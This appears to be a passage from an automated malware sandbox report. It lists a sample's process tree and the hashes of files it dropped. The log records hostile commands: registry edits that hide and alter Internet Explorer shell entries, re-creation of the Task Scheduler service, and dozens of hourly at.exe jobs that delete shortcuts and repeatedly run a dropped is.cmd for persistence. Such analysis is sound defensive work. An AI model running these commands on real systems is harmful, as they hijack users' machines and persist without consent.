C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f4⤵
- Modifies registry class
PID:740
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:1696
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:2072
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:5060
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f4⤵PID:4664
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\copy.cmd3⤵
- Drops file in Program Files directory
PID:4340
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C .\run.cmd3⤵PID:2312
-
C:\Windows\SysWOW64\sc.exesc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"4⤵
- Launches sc.exe
PID:5096
-
-
C:\Windows\SysWOW64\sc.exesc config Schedule start= auto4⤵
- Launches sc.exe
PID:3368
-
-
C:\Windows\SysWOW64\net.exenet start "Task Scheduler"4⤵PID:1644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start "Task Scheduler"5⤵PID:3188
-
-
-
C:\Windows\SysWOW64\at.exeat 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:5100
-
-
C:\Windows\SysWOW64\at.exeat 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:2476
-
-
C:\Windows\SysWOW64\at.exeat 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:3660
-
-
C:\Windows\SysWOW64\at.exeat 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:1740
-
-
C:\Windows\SysWOW64\at.exeat 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4456
-
-
C:\Windows\SysWOW64\at.exeat 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:4900
-
-
C:\Windows\SysWOW64\at.exeat 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:2412
-
-
C:\Windows\SysWOW64\at.exeat 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4732
-
-
C:\Windows\SysWOW64\at.exeat 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:2184
-
-
C:\Windows\SysWOW64\at.exeat 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:3040
-
-
C:\Windows\SysWOW64\at.exeat 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4980
-
-
C:\Windows\SysWOW64\at.exeat 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:1908
-
-
C:\Windows\SysWOW64\at.exeat 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:4048
-
-
C:\Windows\SysWOW64\at.exeat 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:1688
-
-
C:\Windows\SysWOW64\at.exeat 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:3984
-
-
C:\Windows\SysWOW64\at.exeat 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:2228
-
-
C:\Windows\SysWOW64\at.exeat 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:2248
-
-
C:\Windows\SysWOW64\at.exeat 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:2656
-
-
C:\Windows\SysWOW64\at.exeat 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:4692
-
-
C:\Windows\SysWOW64\at.exeat 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4528
-
-
C:\Windows\SysWOW64\at.exeat 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:3008
-
-
C:\Windows\SysWOW64\at.exeat 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:4468
-
-
C:\Windows\SysWOW64\at.exeat 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:1472
-
-
C:\Windows\SysWOW64\at.exeat 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:3504
-
-
C:\Windows\SysWOW64\at.exeat 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:2528
-
-
C:\Windows\SysWOW64\at.exeat 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:2276
-
-
C:\Windows\SysWOW64\at.exeat 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:4968
-
-
C:\Windows\SysWOW64\at.exeat 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:636
-
-
C:\Windows\SysWOW64\at.exeat 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:3120
-
-
C:\Windows\SysWOW64\at.exeat 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:2456
-
-
C:\Windows\SysWOW64\at.exeat 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:2960
-
-
C:\Windows\SysWOW64\at.exeat 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:2684
-
-
C:\Windows\SysWOW64\at.exeat 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:2200
-
-
C:\Windows\SysWOW64\at.exeat 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:3068
-
-
C:\Windows\SysWOW64\at.exeat 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4244
-
-
C:\Windows\SysWOW64\at.exeat 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:2408
-
-
C:\Windows\SysWOW64\at.exeat 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:4540
-
-
C:\Windows\SysWOW64\at.exeat 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4948
-
-
C:\Windows\SysWOW64\at.exeat 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:3696
-
-
C:\Windows\SysWOW64\at.exeat 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:3520
-
-
C:\Windows\SysWOW64\at.exeat 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4484
-
-
C:\Windows\SysWOW64\at.exeat 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:1072
-
-
C:\Windows\SysWOW64\at.exeat 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:3896
-
-
C:\Windows\SysWOW64\at.exeat 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4644
-
-
C:\Windows\SysWOW64\at.exeat 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:1748
-
-
C:\Windows\SysWOW64\at.exeat 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:1580
-
-
C:\Windows\SysWOW64\at.exeat 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4084
-
-
C:\Windows\SysWOW64\at.exeat 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:3048
-
-
C:\Windows\SysWOW64\at.exeat 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵PID:1576
-
-
C:\Windows\SysWOW64\at.exeat 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"4⤵PID:3188
-
-
C:\Windows\SysWOW64\at.exeat 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:1440
-
-
C:\Windows\SysWOW64\at.exeat 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵PID:2216
-
-
C:\Windows\SysWOW64\at.exeat 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"4⤵PID:552
-
-
C:\Windows\SysWOW64\at.exeat 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵PID:4072
-
-
C:\Windows\SysWOW64\at.exeat 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵PID:1740
-
-
C:\Windows\SysWOW64\at.exeat 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵PID:3824
-
-
C:\Windows\SysWOW64\at.exeat 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"4⤵PID:2428
-
-
C:\Windows\SysWOW64\at.exeat 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵PID:4820
-
-
C:\Windows\SysWOW64\at.exeat 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵PID:3704
-
-
C:\Windows\SysWOW64\at.exeat 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵PID:1612
-
-
C:\Windows\SysWOW64\at.exeat 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"4⤵PID:2184
-
-
C:\Windows\SysWOW64\at.exeat 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵PID:5100
-
-
C:\Windows\SysWOW64\at.exeat 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵PID:4304
-
-
C:\Windows\SysWOW64\at.exeat 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵PID:4024
-
-
C:\Windows\SysWOW64\at.exeat 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"4⤵PID:484
-
-
C:\Windows\SysWOW64\at.exeat 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵PID:4048
-
-
C:\Windows\SysWOW64\at.exeat 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵PID:5108
-
-
C:\Windows\SysWOW64\at.exeat 9:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵PID:3412
-
-
C:\Windows\SysWOW64\at.exeat 14:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵PID:4716
-
-
C:\Windows\SysWOW64\at.exeat 18:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵PID:4712
-
-
C:\Windows\SysWOW64\at.exeat 21:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵PID:2248
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51d903a49275ecf0360a005a210710ae1
SHA153d92ee4cf725fd774fde7d8715dc57f05b4ad5e
SHA2565228e97bfb7487be8921377a47ee94aa14ab9fb5208d719fc92cf81350949c6e
SHA5120411ec8b3cf03f3587fb9a47b7e587d879fcdfbc6a56e2637a6e5400f4a4fd49c52adc0012c66bde052ed5b5bf96b53340b361cd99c8c2b3a4087d7147362ff4
-
Filesize
333B
MD5a9d94634d0f188064dd59925ab8a7ce5
SHA191d0736e4f5d173a2b78e001e9b88a1e0ed10366
SHA2562e8421f68d3d2815a83dcc1162bd0bd8ca208f0674a4b1690f96417f17faf597
SHA51292c2299b13a67566b9e20b4869c9a82c5060d39fb565d3e3d2494c13a8a50ce229fc3309da47f666eb77b39533ae0251189647e107b0992d06c7756c4e490545
-
Filesize
256B
MD522ba26c787caf9c226a57ab934efe3a7
SHA141da9b24a7e138eadf7fe359a9832bab35a22098
SHA256506c7c101ef39fb59bcef1a4952f0303f979daf01ffe4048e12458ad3cc0181d
SHA51275609142b2e50fee2136f27c0dd124b3714f052579ab667fbfaf6f167bd1057b967f34d05293bf4b316b8580a3f63a8903fa147c83821087a4102a66ffb4e941
-
Filesize
122B
MD55e1ac5999e539cafa3a303e8386cfbf9
SHA1dcd5ce7b101636bb35b3c38ea4456f20b5fb142a
SHA256d9a95138ba749e2c04355d7b9354d90a45941d20fb120af3d2969779d90748d6
SHA512f18fe45f0731f4deec3fde3ff19fe1b3d586db3e75e748224adfa0b0ea4b1fabab6b7dfbed3a127cadf2ea9ee6a5a0f9191b50055df39e64a5cce90da50a43a1
-
Filesize
12KB
MD5b47fb6ca5604063bb4e0af862ee3be9c
SHA1ebe74903212c246c83d826fa9ce7789141772b30
SHA256fd34806658512394d2f4b9185d32590717b7f2169caad83bea0d93b3564b3044
SHA5120a01779afed506d2e22267205863d23f8570de394704019d23cb1d8239fa1735d04976bc3cdcab301db33297cd6a2203afbc4238c1158edb044ba4a65a2db814
-
Filesize
3KB
MD593283cb2cbb91dc2553d3ccc53c24787
SHA1271054a80b7332910d4f746ccbabd6b9d85915fe
SHA25631d5b5b80fc2c292ae1d3d94e6c35b5272e8ad0e9b06aa086eb61d6238d66beb
SHA5126b485717301db3a10fde12b378de7e79a018e5e33eef9808c1a414a2b5ba983cc4b32a1bbfa5cd4005085c648381f663eb15c35f1e06c5b3e58bbc6fc6e5b70f
-
Filesize
939B
MD5e9453c56277dd24802b553677d0620fc
SHA18b27914191feae8061dd9577d473a638173b92a7
SHA25646493b2ba1dbf1f0b360d276423c0e7b7f99cdbe7f23a623d63ce8f20f82ea2d
SHA512c55a87c18ab67756556943c480385d6a42bb0904b090885b93c151f4661a132c9eb67a9838876af6217636a313a3a817629c2a0fe2a43313fddf1978191d8e41